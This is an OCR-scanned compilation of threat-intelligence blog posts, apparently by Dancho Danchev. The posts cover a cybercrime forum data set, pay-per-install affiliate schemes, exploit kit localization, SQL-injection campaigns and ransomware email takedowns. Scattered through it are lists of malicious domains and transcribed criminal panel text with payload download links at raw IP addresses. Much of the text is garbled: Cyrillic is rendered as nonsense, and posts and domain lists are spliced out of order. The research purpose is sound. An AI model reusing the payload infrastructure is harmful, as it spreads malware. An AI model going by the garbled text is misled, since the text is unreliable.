17.4.4 Recommended High-Profile Daily Military Technology Video! (2021-04-07 14:17) 


Dear blog readers, 


Continuing the "[1]Travel Without Moving" blog post series where | used to feature a high- 
profile publicly accessible satellite imagery for a variety of high-profile locations throughout 
the years I’ve decided to share a highly recommended video which is basically a [2]JTHAAD 
demonstration video which you should watch and enjoy in case you’re interested in learning 
more about modern military technology. 
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Stay tuned! 


1. https: //ddanchev. blogspot. com/search/label/Travel/20Without/20Moving 


2. https: //www. youtube .com/wat ch?v=D0zqSUqUuCI 


17.4.5 Announcing Astalavista.box.sk’s Flagship Dark Web Search Engine! Visit Us 
Today! (2021-04-07 19:42) 


Dark Web Search Engine 


-————— 


17.4.6 Recommended Song of the Day! (2021-04-14 03:37) 


Dear blog readers, 


I’ve decided to continue posting and recommended relevant and high-profile songs of the day 
with the idea to empower you to stay on the top of your game and to empower and offer a new 
listening experience for your work. 
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Stay tuned! 


17.4.7  Dancho Danchev’s Second Edition of Cybercrime Forum Data Set for 2021 - 
Direct Download Available! Request Copy Today! (2021-04-14 03:37) 


[1] 
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19GB 


Cybercrime Forum 
Data Set 2021 


Dear blog readers, 


This is Dancho and | wanted to let everyone know that I’ve just released the second edition of 
the original "[2]Cybercrime Forum Data Set for 2019" this time including an additional set of 
full offline copies of over a dozen of publicly accessible cybercrime-friendly forum communities 
with the idea to distribute the Data Set to the academic community including vendors and orga- 
nizations and researchers including U.S Law Enforcement and the U.S Intelligence Community 
part of my currently ongoing Law Enforcement and OSINT operation "[3]Uncle George". 


Users interested in receiving a direct download link (19GB) of the second edition of the 
Cybercrime Forum Data Set for 2021 which now includes full offline copies of over 111 
publicly accessible cybercrime-friendly forum communities should approach me at dan- 
cho.danchev@hush.com and | would be happy to offer a direct download link for you and your 
organizations. 

Sample cybercrime-friendly forum communities included in the Data Set include: 
evilhack.ru.rar 
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gerki.pw.rar 
ProLogic.rar 
SEOForum.rar 
c-cracking.org.rar 
Whitehat.vn.rar 
neadekvat.ru.rar 
www.opensc.ws.rar 
gofuckbiz.com.rar 
Darkode.rar 
hackademics.fr.rar 
darkmoney.de.rar 
xaker.name.rar 
Xakep.bg.rar 
sysadmins.ru.rar 
PhreakerPro.rar 
Master-X.rar 
Chf.rar 
Darkmarket.la.rar 
Webmasters.ru.rar 
reversing.cc.rar 
monopoly.ms.rar 
Exelab.rar 
blacktip.top.rar 
ghostmarket.net.rar 
DomenForum.rar 
Antichat.ru.rar 
Hack-Port.rar 
ProxyBase.rar 
replace.org.ua.rar 
Eviloctal.rar 
Xakepok.rar 
WWH-Club.rar 
Szuwi.rar 


GoFuckBiz.rar 


www.forohack.com.rar 
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Promarket.rar 
pay-per-install.org.rar 
LinkFeed.rar 
TotalBlackhat.rar 
Mr11-11mr.7olm.org.rar 
iFud.rar 
Piratebuhta.pw.rar 
BPCForum.rar 
ForumSEO.rar 
Cracked.to.rar 
Forum.Zloy.bz.rar 
ProCrd.rar 
Crack-Forum.rar 
alligator.cash.rar 
Mmpg.ru.rar 
Maultalk.rar 
ForumSape.rar 
SEOCafe.rar 
dwh.su.rar 
BigFozzy.rar 
Gla.vn.rar 
Zismo.rar 
it-24h.com.rar 
Forum-UINSell.rar 
carderplanet.rar 
4HatDay.rar 
Toolbabase.se.rar 
ubotstudio.com.rar 
aHack.rar 
Linuxac.org.rar 
imhatimi.org.rar 
Svuit.vn.rar 
Free-hack.rar 
xaknet.org.rar 


www.ryan1918.com.rar 
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Darkmoney.rar 

shadowcrew-2.rar 

Hackersoft.rar 

BlackhatWorld.rar 

Nullnoss.org.rar 

365Exe.rar 

Aljyyosh.rar 

forum.cybsecgroup.com.rar 

Hackingboard.rar 

Szenebox.rar 

Cardvilla.rar 

iHonker.rar 

SkyFraud.rar 

H4kurd.com.rar 

moneymaker.hk.rar 

CNSec.rar 

Cyberizm.rar 

Turkhackteam.rar 

forum.reverse4you.org.rar 

CNHonker.rar 

security-teams.net.rar 

itsobr.com.rar 

Spyhackerz.rar 

ArmadaBoard.rar 

iransec.net.rar 

xaker26.info.rar 

11Wang.rar 

Hackings.rar 

Sample directory listing for the "Cybercrime Forum Data Set for 2021": 
BatatDayrr 
$3 11Wang.rar 
S aHack.rar 


= Aljyyosh.rar 

= alligator.cash.rar 
= Antichat.ru.rar 
= ArmadaBoard.rar 
= BigFozzy.rar 

$B BlackhatWorld.rar 
= blacktip.top.rar 
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$B BPcForum.rar 
= carderplanet.rar 
eS carders.sé.rar 

N= cardingmafia.ws.rar 
eS cardingsite.cc.rar 
BS Cardvilla.rar 

BS c-cracking.org.rar 
eS Chf.rar 

BS CNHonker.rar 
BS CNSec.rar 

S Cracked.to.rar 


=e Crack-Forum.rar 
S crdcrew.cc.rar 

eS crdpro.cc.rar 

= Cyberizm.rar 

eS Darkmarket.la.rar 
BS darkmoney.de.rar 
BS Darkmoney.rar 

eS darknet.kr.rar 

=e darknetforum.is.rar 
= Darkode.rar 


N=] DomenForum.rar 


$3 dwh.su.rar 

=e evilhack.ru.rar 

$B eviloctal.rar 

eS Exelab.rar 

eS forum.cybsecgroup.com.rar 
BS forum.reverse4you.org.rar 
S Forum.Zloy.bz.rar 

=e ForumSape.rar 

=e ForumSEO.rar 

$B Forum-vINSell.rar 

S Free-hack.rar 

= gerki.pw.rar 
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= ghostmarket.net.rar 
=e Gla.vn.rar 

= gofuckbiz.com.rar 
$B GoFuckBiz.rar 

S hOst.pw.rar 

N=} H4kurd.com.rar 
eS hack-academy.ru.rar 
BS hackademics.fr.rar 
=e Hackersoft.rar 

=e Hackingboard.rar 
S Hackings.rar 

$3 Hack-Port.rar 


=e ica.su.rar 
= iFud.rar 


eS iHonker.rar 

A=} imhatimi.org.rar 
S iransec.net.rar 
eS it-24h.com.rar 
eS itsobr.com.rar 
§B LinkFeed.rar 

= Linuxac.org.rar 
N=] Master-X.rar 
= MaulTalk.rar 


=e Mmpg.ru.rar 
S moneymaker.hk.rar 


N=} monopoly.ms.rar 

eS Mrl1-11mr.7olm.org.rar 
S neadekvat.ru.rar 

eS Nullnoss.org.rar 

eS pay-per-install.org.rar 
S PhreakerPro.rar 

= Piratebuhta.pw.rar 

R=] procrd.biz.rar 

= ProCrd.rar 
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= ProLogic.rar 
N=} Promarket.rar 
= ProxyBase.rar 


S red.ug.rar 
S replace.org.ua.rar 


BS reversing.cc.rar 

S russiancarder.ru.rar 
S security-teams.net.rar 
SB SEOCafe.rar 

= SEOForum.rar 

= shadowcrew-2.rar 


= SkyFraud.rar 
=e Spyhackerz.rar 


S Svuit.vn.rar 

eS sysadmins.ru.rar 
BS Szenebox.rar 

eS Szuwi.rar 

= Toolbabase.se.rar 
BS TotalBlackhat.rar 
A=} Turkhackteam.rar 
N=] ubotstudio.com.rar 
= venera.bz 


§B verified.bz 

= Webmasters.ru.rar 

= Whitehat.vn.rar 

$3 Wwe-Club.rar 

S www.forohack.com.rar 


=e WWW.Opensc.ws.rar 


S www.ryan1918.com.rar 
= Xakep.bg.rar 

eS xaker.name.rar 

= xaknet.org.rar 

N=] Zismo.rar 


Stay tuned! 


1. https://1.bp. blogspot .com/-xf j JwUdQ4nc/YHY3MePbYpI/AAAAAAAAMEE/ZmKVWKHYqKsi-ViEay-m5j6NTHwKrG_wQCLcBGAsYHQ 


s643/Misc_24.png 
2. https: //ddanchev.blogspot .com/2021/04/dancho-danchevs-cybercrime-forum-data. htm 
3. https: //ddanchev.blogspot .com/2021/02/dancho-danchevs-law-enforcement-and.htm 
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nihaorrl.com 


free.hostpinoy.info 


xprmn4u.info 


nmidahena.com 


winzipices.cn 


sb.5252.ws 


aspder.com 


11910.net 


bbs.jueduizuan.com 


bluell.cn 


2117966.net 


s.see9.us 


xvgaoke.cn 


1.hao0929.cn 


414151.com 
cc.18dd.net 


kisswow.com.cn 


urkb.net 


c.uc8010.com 


rmb.net 


ririwow.cn 


killwowl1.cn 


1522 


17.4.8 Security Interview with Me - In Russian! (2021-04-14 03:42) 


Russian OSINT 4 


VnTepebto c OSINT cneumanuctom flaHyo 
ianyesbiom. He Ha Bce BONpPOCbI yAaNocb 
NONYYUTb PasBepHyTbie OTBETHI, HO B 
UeNOM NOCbIN NOHATeH. Ku6epKpalim 
nporpeccupyer, ransomware rnaBkbiit 
TpeHg 2021 roa, a CJA no-npexHemy 
HaXOQMTCA B KOHTpax C Poccnei. 
ConepkaHve MHTepBbiO: 


= Kto taxon Jlanuo? 

> YeM OH 3HAaMEHMT? 

> PaGota Ha U.S Law Enforcement u U.S 
Intelligence Community 

> OSINT onepauma “Uncle George” 

> Cybercrime Forum Data Set Ha 16 [6 
> Ransomware uw Darkweb 

> Mpn6binb REvil 

> “PoccHA OCTaeTCA fNaBHbiM 
paccaguuKom Ku6epnpectynHocTH” 

> Ku6epnpectynxocTb Be CHT 


https://telegra.ph/Intervyu-s-hakerom- 
Dancho-Danchev-04-12 


Telegraph 

VUntepspw c GonrapeKum xaxepom 
Alan4o Jlanvesbim cneyuanbHo 
aia Russian OSINT: Kn6epxpaim B 
2021 

Vima: Dlanyo flanyes / Dancho Danchev Pog 
sanaTHa: VB uccnegosarenb, OSINT 
cneynanucr Cneynannsayna: KuGepxpaiim, 
Darknet && OSINT Crpaxa: Bonrapua Car: 
ddanchev.blogspot.com Twitter: 
https://twitter.com/dancho_danchev Russian 
OSINT: flanyo, pacckaxxv HEMHOTO... 


114 GY Ane 12 48 14:84 


wa VIEW IN CHANNEL 


Dear blog readers, 


Check out this [lL]linterview with me in Russian! 


Stay tuned! 


1. https: //telegra. ph/Intervyu-s-hakerom-Dancho-Danchev-04-12 
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gigigm.com 
wowgml.cn 
wowyeye.cn 
9i5t.cn 
computershello.cn 
z008.net 
b15.3322.org 
direct84.com 
caocaowow.cn 
qiuxuegm.com 
firestnamestea.cn 
qigil11.cn 
banner82.com 

> P 

meisp.cn 
okey123.cn 
b.kaobt.cn 
nihao112.com 


al.99.vc 


aidushu.net 


chliyi.com 


free.edivid.info 


1523 


[13] 
15206 


PRODUCTS 


ichev's Blog - Official Fu 


yilation Archive 


ncho Danchev Security Research ZD 
Jay Blog Official Full Offline E-Book 


Dancho Danchev's Offens 


Warfare Articles for Unit-123 Full Offline 


Dancho Danchev's Security search 


Compilation Official Full Offline E-Book C 


$50 $300 
Security 


Official Full O 


nchev's “Malware - Future 


Official Full Offline E k Compi 


e 


ormation S 


[14] 
15207 


07:23 @ + & - 


SERVICES 


Cyber Actor Profiling 


e Scenari 


rime Intelligence 


Informati 


[15] 
15208 


Search Engine 


II 


Web Search by the People, 


for the People 


Text Images more options 


[16] 


15209 


NOTIFICATIONS 


berAttack #cy 


ader support in case 


1 what Im up to and th 


Stay tuned! 


1. https://1h3.googleusercontent .com/-zyY5vH9bxa4/YIVyCvNXPZI/AAAAAAAAMIE/qVbPxn08c1Qey5ADXgEXypZvigq_u180yAC 
cBGASYHQ/s1600/1619358216844581-0. png 


. https: //twitter.com/dancho_danche 
. https: //medium.com/@danchodanche 


. https://box.sk/wordpress 
. https: //www.youtube.com/watch?v=hgQ_nxoMXz 
. https://astalavista.box.sk/ 


8. https://1h3. googleusercontent .com/—yGnidPKYqkE/YIVyAaSOWuI/AAAAAAAAMH8 /4sEeQI1LYnciTW1T1120SyiAEX51HUGNWCL 
9. https: //1h3.googleusercontent . com/-Z4W9vzVW1BY/YIVx-kJG1cI/AAAAAAAAMH4/Uts_nDi3vK0S6-5UsSe2IxBVOV_suF7jwCL 
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NouRWN 


10. 
11, 
12. 
13. 
14. 
15; 


16. https://1h3.googleusercontent.com/-RivrGIBev8g/YIVx0tUwG6I/AAAAAAAAMHc/HmXeBOV4A j AyMgHsQe-Dk4v0x_KODmNJ 


LcBGAsYHQ/s1600/1619358158053038- 10. png 


17.4.13 Exposing the Pay Per Install Underground Business Model - Historical OSINT 
- An Analysis - 2008 - Part Two (2021-04-27 10:34) 


Home Downloads Payments Contact Us Referals Logout 


EASY CASH 


$15 PER SALE 
A WARE It's time now to make big money! 
etter then pay-per install and other 
dolla rs ee 
Also, think about reselling - you can start your $0 


own business quickly and without big efforts 
and investments. 


Downloads 


Link to crypted promo-exe: 
http://69.65.51.47foaders 


Link to non-crypted promo-exe: 
htto://69.64.51.47foaders2-nc 


Promo-link: 


htto://pcsecurityiab.com/ff ll 


Referral link: 
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In my previous [1]analysis on the pay per install underground market business model | 
elaborated more on the actual business model using a variety of images which I’ve collected 
over the years to showcase the business model sticking to the usual "an image is worth a 
thousand words" methodology. 


In this post I’ve decided to continue the series and offer an additional exclusive peek inside 
the cybercrime ecosystem pay per install underground market business model including to 
discuss in-depth the tactics techniques and procedures of the cybercriminals behind these 

campaigns. 


Sample screenshots of various pay per install business franchises throughout the years in 
particular circa 2008: 


EASY CASH 


ADW ARE : $15 PER SALE 


Orscoun lowers 
*Please note each refund cost you $21 


Resellers 


Speciai rates for reseliers 
Whie-ebel sokfion everything under your 
nd 
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52-0.cn 


actualization.cn 


d39.6600.org 


h28.8800.org 


ucmal.com 


t.uc8010.com 
dotall.cn 


bcO.cn 


adword71.com 


killpp.cn 


w11.6600.org 


USUC.US 


msshamof.com 


newasp.com.cn 


wowgm2.cn 


mm.jsjwh.com.cn 


17ge.cn 


adword72.com 
117275.cn 


vb008.cn 


wowl112.cn 


nihaoel3.com 


Some new additions that I’m tracking : 
1524 


SIGN UP! 


i 


CASHNBOOM. BIZ 


UOULLLE @ 


euEWGe =| STATS (UNKS, PAYMENTS  =§ «FAQ =sREFFERALS «= CONTACTS) «=—s«USER FO LOGOUT 


CURRENT TME: 2009-06-04 15:46:22 


News 
2009-06-02 BbITINATbI 3A MAM MPOSBEQENbI B NONHOM OB bDEME 


Benaventi MeHbMt 3a Mail, exruOVaR ppc w Cpy Ges xonna 
Cnaci6o 3a paboty, HaQeeMcA Ha MONrospemeHoe NapTHepcTeo! 


2009-06-01 B PESMENE REFFERALS OGHOBNEHHE 
Dotasunu KaxXQOMy SKKSyHTY MHESITEA MH PE@Hepanbcue cceankn QnA yHooHoro npwenevennr peoos! 
Your refferal links and invite codes can be found at REFFERALS section of the members area! 
You will get 5% of the refferers revenue 

2009-05-27 BHUMAHHE! “TOBbI HE TEPATb HAL TPA@IHK BO BPEMA MEHRIITE NOMENDI AA CNMBA TPA@A! 


B paanene LINKS ECT CCRINKS HA SKTYaNbHeIE DOMENDI, STO NOMOXKET NitTh TRAQUK Ha BCEMMS akTyaNbHbiMt yon! 


2009-05-06 HAYASINCb BETA TECTbI CHCTEMBI 


Noagpasnaem, fomnannce! 
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CO pa 
Ji & @ 


DAY INCOME: $0 | CURRENT TAME: 2009-06-04 17:13:26 


Stats 
pemoo: —_[ From 2009-06-16 to 2009-06-31 - 
FROM 01 ¥ | June ¥ 209%) To (04 ¥i\ure 2009 


2009-08-01 fr) ° ° so 0 30 
2009-06-02 0 0 0 so so so 
2009-06-03 ° o 0 so s 30 
2009-06-04 0 0 ° $0 so so 


Lith @ 


DAY INCOME:$0 | CURRENT Tae 
Links 


1. exe link 


a 


2. Current domains export link (use it to be sure you send traffic right domain) 


3. Antivirus Scanner (for mainstream traffic) 


activt-scanner-stree com/7atelf Thor mainstream traffic) 


4. celebs tube 


Gelebs-tube-zone com 


5. warez portal 
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NEWS STATS UNKS PAYMENTS FAQ REFFERALS CONTACTS USER NFO LOGOUT 


Refferals 


You are refferal ofL_] 


Your refferal link: 


_ aT | 


Your invites: 


get invite 
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GIVE THOSE CODE ¥ TO WEBMASTE 40 READY TO PROVIDE REAL VOLUME, AT LEAST 500 INSTALLS PER 
DAY. DONT FORUMS, WE NEED ONLY ACTIVE WEBMASTERS. 


15216 


ExeRevenue.com 


Affiliate Panel 
Welcome oo: a | 


13/4/2009 
CRITICAL EXE UPDATE, ¢ s pply it, we have added a new feature that wil prolong bots Ufe significantly. We think that your traffic rating wil 


8/4/2009 
Important Exe update! We have added new functionality, so please UPDATE URGENTLY! Pease atso notice the additional clause in EULA 


A ‘our account ts stfl unverified. Until you make at least 1005, you wil not be able to access fresh versions of our software component 
——— nes 22 28st wexere 16. he? ell 74 POMS oe 


DO NOT HOTLINK EXE URL! 
00 NOT SEND TO ONLINE VIRUS SCANNERS! 


Earned today 


* 


Earned this week: 


” 


M our account is st@ unverified. Unta you make at least 1005, you wil not be able to access fresh versions of our software component 


Temporary EXE tink: netp://228.93.205.30/exerev 024 ph IN O74 hours cx 
DO NOT HOTLINK EXE URL! 
DO NOT SEND TO ONLINE VIRUS SCANNERS! 


Earned today os 
Earned this week: os 
Traffic rating N/A 


Account Configuration 


New password: 
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\ Terms of Use (Standart) 
“ INSTALLAGA.CN _ | cas Oe teoee Cece es Pee To 


» Every day new domains for sending traffic are 
provided. 


We penetrate as nobody does 
~ 
oars 


LATEST NEWS 


2099.06.06 
Our forum is avaiable again 
2009.06.05 
One of ou users hes developed crit to change 
inks a.tomaticaly in Simple TOS. 
MAIN STATS we 
eo 2009.06.04 
We have made new crypt of explots. 
6 5 © 0 QO wa a 
Toes : ° 0 0 4 ; | TOP LOADERS 
Ot. -gd 30890 (11 606%) 
tons 0(o%) 0(o%) 00%) o(o%) 0(o%) om) 2-90 10009 (353718) 
04. Dt. 7677 (4.2863%) 


05. hy. 6961 (17 982%) 


06. hs- 6137 (10687%) 
09. 1-b 4872 (12.650%) 
- 


an ane oF aoa S 
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_@ 
installconvertetcom oe 


Voge installs: 


Filter Username: ex — 
Emat: sapport Pinstalicceverter.com 
® Actual date period © Selected period items per page Group by: leg: 404764419 
ke: 402138123 
From 01 to 15 | 20 Date dime InstatConverter 
c | saat 3 s Fists" 4. MSN: InstalConverter@totmat.com 
To 2 Scale daily 
Home 
show stats Pavments 


Account Information 


ribo derta 
Center 


If you have a probiem or require 
assistance, please contact us at 


support @instabConverter.com, we wi 
respons within 24 hours. 
oa 
r 
fogua password 


<@ 
installconvertef.com 


PROGRAIS SIGN LP CONTACT US 


Join us and start getting money immediately! 

Customers from all over the world can get distribution and bundting services with the help of InctaliConverter program. InctaliConverter & a cutting-edge 
application that gives you an opportunity to increase your experience and enlarge your income in hours. You can ato design stable and smooth web presence. 
Youll save time and money and get wonderful opportunities with Install onvertert 


@ News @ Operating Benefits ° 
Cooperating with InstaliConverter is like Start making ! 
ee business but without any money now! 
More information and reasons 
that you should be part of our 
team! 


Permanent bonuses. Do your best and get 
extra money! The sum of money youll get 
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a.13175.com 


r.you30.cn 


d39.6600.org 


001yl.com 


free.edivid.info 


aaa.111111.Com/error/404.htm| 


cc.buhaoyishi.com/one/hao5.htm?015 


aaa.77xxmm.cn/new858.htm?075 
IISging.com/ww/new05.htm?075 


shijledlyl.net/one/hao8.htm?005 


congtouzallal.net/one/hao8.htm?005 


aa.llsging.com/ww/new05.hTm?075 


The rough number of SQL injected sites is around 1.5 million pages, in reality the num- 
ber is much bigger, and there are several ongoing campaigns injecting obfuscated characters 
making it a bit more time consuming to track down. Who’s behind these attacks? Besides 
[3]the automation courtesy of botnets, the short answer is everyone with a decent SQL 
injector, and [4]today’s SQL injectors have a built-in reconnaissance capabilities, like this one 
which | assessed in a previous post. 


1. http://blogs.zdnet.com/security/?p=1122 


2. http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar .20080514 


3. http://ddanchev. blogspot. com/2007/07/sql-injection-through-search-engines.htm 


4. http://ddanchev. blogspot .com/2007/05/google-hacking-for-vulnerabilities.htm 
1525 


Syndication t& the best way to get free content and get paid for it! You can choote from different games, 
audio, softwere, multiple free “deos for your website. For every new lratali onverter 


any country we credit for, InctalK onverter gives 


restal 
¢ you money 


produced from 


Gateway t& the way to secure the ¢: 


your website with 2 Ins 
You get money for each new Insts 


orwerter Gateway page 


duced from the countries we trust to. People inctall 
InstalK onverter to get to your content free. It's a chance for you to monetize on your content! 


$ the brilliant way to get extra money, by tpreading the inform 


on about InctalC onverter 


install Rates 


$0.1 


Canada 


United Kingdom 


$0.07 
Western Europe 


$0.03 
Other countries $0.02 
Asian Traffic (TBO) 


its basic rates after first 5 days depending on install effictency we changing them. Rate can increase 2-3 
times 


mma EEA AAY ALY MANY AA 


Inctrall Lach 
> 7 


omarn changes! Please, 


Adverts tink 


EXE Link(last update 25 hours ago): 
i! EXE Link works only 2 minutes (' 


15223 


Home 

Report/Stats 
Referral Stats 
Account information 
InstaBation Fies 


Message Center 


My Sales Person 


Username 


15224 


Members Area / Home 


tipeswwvanecancon use this affiliate referral linking code on your affiliate resource 
site, affiliate newsletter ors , who might want to promote our product We pay you 10% of 
everything they make in retum for referring the affiliate to us. For as long as they promote us — you get 
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Installs 
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Make money easily! 
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0.05 0.03 0.02 0.01 0.02 0.01 
* 462-177-683 (Support #1) 0.03 0.01 0.02 0.01 

0.03 0.01 0.02 0.01 


Bonpocbi? 


© 472-273-211 (Support #2) 


OctanpHese crpantt ~ 0.01 yet 3a wucrannl 
Kenn C TeX CTPGH, 4YTO He YKARINDE B TOON He ONNAYNBAIOTC 


right © 2008 Profit-Cash.Biz 


Stats | Profile & File | Payment History | Messages (0/0) | Loa Off | Ballance: 0.0000 $ 
Redirect/cicks stats Money stats 
— Redirects — Money 
0 a 0 
01 April 2009 06 April 2009 01 April 2009 06 April 2009 


15231 


15232 


|| 0 


O01 April 2009 


TTS 


Date 


01 April 2009 
02 April 2009 
03 April 2009 
04 April 2009 
05 April 2009 
06 April 2009 
07 April 2009 


TOTAL: 


06 April 2009 O1 April 2009 


Anpent ¥ 
> Nokasate 
CYSTHCTHKS COxXPSHAeTCA Ba NOCMeAHHEe 30 Aner. 


Stats 
Bots Redirects Clicks cTR 
(total / searched) 
0/0 t) C) 0% 
0/0 0 t) 0% 
0/0 0 0 0% 
0/0 ° 0 0% 
0/0 0 0 0% 
0/0 0 C) 0% 
0/0 0 C) 0% 
o/o e es 0% 
Ktroro no Goran (2.2 eni6pannoi nepron) 
BCero YHHKaNbHbIx: 0 
Cpeaxnh poxog oT 1 Gora: 0.00 $ 


06 April 2009 


2009 ¥ 


Middle 
bid 
0.0000$ 
0.0000$ 
0.0000$ 
0.0000$ 
0.0000$ 
0.0000$ 
0.0000$ 
0.0000$ 


Money 


of 
o¢ 
o¢ 
oF 
o$ 
o¢ 
o¢ 
os 


4.5.25 The Icepack Exploitation Kit Localized to French (2008-05-23 23:19) 


SCOR Ges = Ee eo 


Internet Explorer 60: 1 


Firefox 2.00 


Internet Explorer 7.0 
Mozilla $0: t 
Virefex 20: * 
Firefox 1.50 
Opera 922: 2 
Firefom 1.05 1 
Mozilla 40: 1 
leterne ttupterer S50 1 
Opers 9.21 


Opere 9.23 i 


Bonjour! In a surprising move by the French blackhats, the Icepack web malware exploitation 
kit has been localized to French, further expanding the list of malware kits localized to foreign 
languages, and [1]confirming the localization trend (page 18). Localization has been silently 
taking plance in the IT underground for the last couple of years, and as of recently going 
mainstream, followed by the localization of such popular web malware exploitation kits such 
as [2]MPack, [3]lcepack and [4]Firepack, all to Chinese. 


The long term impact of localization will improve the communication between those offering 
malicious services, and those looking for them in their native language. For instance, the 
sites of certain malicious services are already available in several different languages, and 
the quality of the translation is courtesy of available translation services provided by native 
speakers. 
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WARNING! 
Protect your systerg 
Automatic system $ 


Scan status: Threat Detected 


Checking files: 64 


S Suspicious files: 2 


Antivirus Protection 


Internet Browser Protection 


Do you want to run or save this file? 


Name 02d79.exe 
Type Application, 32.5KB 
From instaliz.cn 


While files from the Internet can be useful, thes file type can 
potentially haem your computer. If you do not trust the source, do not 
tun or save this software 


SEND MESSAGE 


Not installed 


Not found 
Not found 


Not installed 
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Orta 


Nembre totel Cefections 


Moreover, breaking the language barrier doesn’t just expand the market, but also, improves 
targeting for malware, spam, and phishing campaigns, where a truly professional campaign 
would speak the native language so naturally, it would leave the receipt with the feeling that 
it’s originating from somewhere within their homeland. In reality though, the malicious parties 
behind it, or the managed spam providers vertically integrating to offer translations services, 
would be on the other side of the planet. 


1. 

2. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
3. http: //ddanchev. blogspot .com/2007/10/mpack-and-icepack-localized-to-chinese.htm 
4. http://ddanchev. blogspot .com/2008/05/firepack-exploitation-kit-localized-to.htm 
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Dear blog readers, 


As many of you know I’ve been officially running a high-profile security and hacking project on 
the original [2]Astalavista.box.sk including the launch management and maintenance of one of 
the Web’s most popular and high-traffic volume search engine for hackers and security experts 
where we’re currently accepting advertisers and offering a pretty good advertising inventory 
in terms of traffic while we’re offering a permanent banner and a text link for those who are 
interested. 


[3] 
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20:19 8 8h Meo“ 4G 


= Try “Users last week" © 


Apr 21 - —_ 
nee < > = 
Behavior overview 
Avg. Session Duration Bounce Rate Pageviews 
00:00:43 78.42% 2.27K 
77.61% 40.78% +3.98% 


Trend of Avg. Session Duration 
00:00:43 +00:00:03 ( t 7.61%) 


Apr 21 23 25 i 
= Current Period -- Previous Period 


Goals overview 


Goal Completions Goal Conversion Rate Total Ab 


[4] 
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20:20 82M - mefag 


— ry “Users last week © 


Apr 21 = Apr 27 
a. eee ¢ 4 
Active users overview 
30 Day Active Users 7 Day Active Users 1 Day Act 
6.97K 1.7K 271 
T 16.0% + 0.18% T 15.32% 


Daily Trend of 30 Day Active Users 


6,973 +962 ( T 16.0%) 


Apr 21 3 5 


= Current Period -- Previous Period 


Users by time of day 
Users 


1,534 -135 (48.09%) 


Are you interested in advertising at one of the Web’s most popular and high-traffic visited 
Web site for hackers and security experts since 1994 up to present day? Drop me a line at 
dancho.danchev@hush.com to discuss. 


1. 
2, expe: /astalavista. bor. 

3. https: //1h3. googleusercontent . com/-e2v5xzikyks/Y ImbS3TZqZI /AAAAAAAAM3Y/c7d55bxoRQYrS1nofX6APKV—u3kKrT6kgCL 
4. 
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17.4.19 My Response to Ransomware! - An Analysis (2021-04-29 18:00) 


[1] 


18:54 &  @ «+ Moh 40 


¢ Tweet 


Dancho Danchev @dancho 11 Nov 20 

© New Post - "Exposing Protonmail and 
Tutanota’s Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


ProtonMail @ 
@ProtonMail 


Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have 

zero tolerance for abuse and 

we'll investigate this and take the 
appropriate actions. 

17:52 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


Tweet your reply (9) 


Dear blog readers, 


Worry about ransomware and its epidemic growth next to the hype of cryptoviral extortion 
which | originally predicted in my "[2]Malware - Future Trends" paper circa 2006? Keep reading. 
Part of an ongoing effort on my behalf using Technical Collection and continuing my [3]series 
of posts [4]exposing the activities of [5]ransomware gangs | managed to take offline approxi- 


mately 3,000 email addresses belonging to ransomware gangs and lone individuals using ran- 
somware in direct cooperation with Protonmail and Tutanota’s Abuse Departments. 


[6] 
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18:54 2 @ - Mo" 4 


} Tweet 


Dancho Danchev @dancho 11 Nov 20 

© New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


Tutanota 
@TutanotaTeam 


Replying to @dancho_danchev and @ProtonMail 


Thanks for reporting and for sending 
the list early on via email. We have 
investigated and blocked abusive 
accounts already. It's always 

best to forward abusive emails 

to abuse@tutao.de so we can act 
immediately. 

19:16 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


Tweet your reply (9) 


Stay tuned! 


1 
2 

3. 

4. https: //ddanchev. blogspot .com/2021/02/profiling-currently-active-high-profile.htm 

5. https://ddanchev. blogspot .com/2020/09/profiling-currently-active-high-profile.htm 

6. 


BGAsSYHQ/s1600/1619712011313015-1.png 
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17.4.20 Exposing China’s "Thousand Talents Program" - An OSINT Analysis 
(2021-04-29 18:42) 


China’s "[1]Thousand Talents Program" is known to be the country’s one of the main sources 
for attempting to steal and lure foreign scientists into falling victim into a vast network of sci- 
entific research activities for foreign countries which in reality can fall victim to active counter- 
intelligence and intellectual and technological "know-how" exchange and stealing for the pur- 
pose of exchanging financial incentives. 


In this post I'll discuss in-depth China’s "Thousand Talents Program" and provide actionable 
intelligence on the actual recruitment practices. 


Sample Shanghai Jiao Tong University Application Form: 


15248 


APPLICATION FORM FOR TITLED PROFESSORSHIP POSITION 


SHANGHAI JIAO TONG UNIVERSITY KOGUAN LAW SCHOOL 


Applicant: 
Position Title: 


Date of Application: 


SHANGHAI JIAO TONG UNIVERSITY KOGUAN LAW SCHOOL 
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+ 1. Basic Information 


Date 
Gender of Nationality 
Birth 
; School of Date of Highest 
ee 


Li of poner of 
‘—— 
— Institution(s) ey 
Visking pares Visiting 
Institution(s) Title 


ei 


Seated © Residence Permit (RP) A for Nationals 


; © RP B for Foreigners or Compatriots 
-_ from Hong Kong, Macao and Taiwan 
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4. Honors and Awards 


** Content refers to the title of a specific teaching or academic achievement being honored or awarded. 


* Title refers to honor or award title such as National Excellence in Teaching Award. 
*** Personal Role: personal ranking in honor or award certificates. 
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>. Kepresentative Academic Achievements 


(No more than 20 titles) 


Publishing 


= 
3 
g 
g 
E: 
3 
J 


* Personal Role refers to editor-in-chief, deputy editor-in-chief, sole author or co-author 
and ranking. 
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4.5.26 How Does a Botnet with 100k Infected PCs Look Like? (2008-05-26 09:35) 


+ Joins: [4ee@|CHM[S9772} (~XP-se0eet 
« Joins: (W@@;/COR;S4612) (~2K-7 07 ER5 
« Joins: [OO] ISA;SS10R8) (~xP-7385e8 
+ Joins: (Mee) Tur 16006) (~xXP-96O7ec [eos 
« Joins: (G9) GOA, AON1S2) ("xP -135 eur -com) 
* Joins: 
* Joins: 
* Joins: 
* Joins: 
« Joins: 
* Joins: 
* Quits: onnection reset by peer) [oojs 
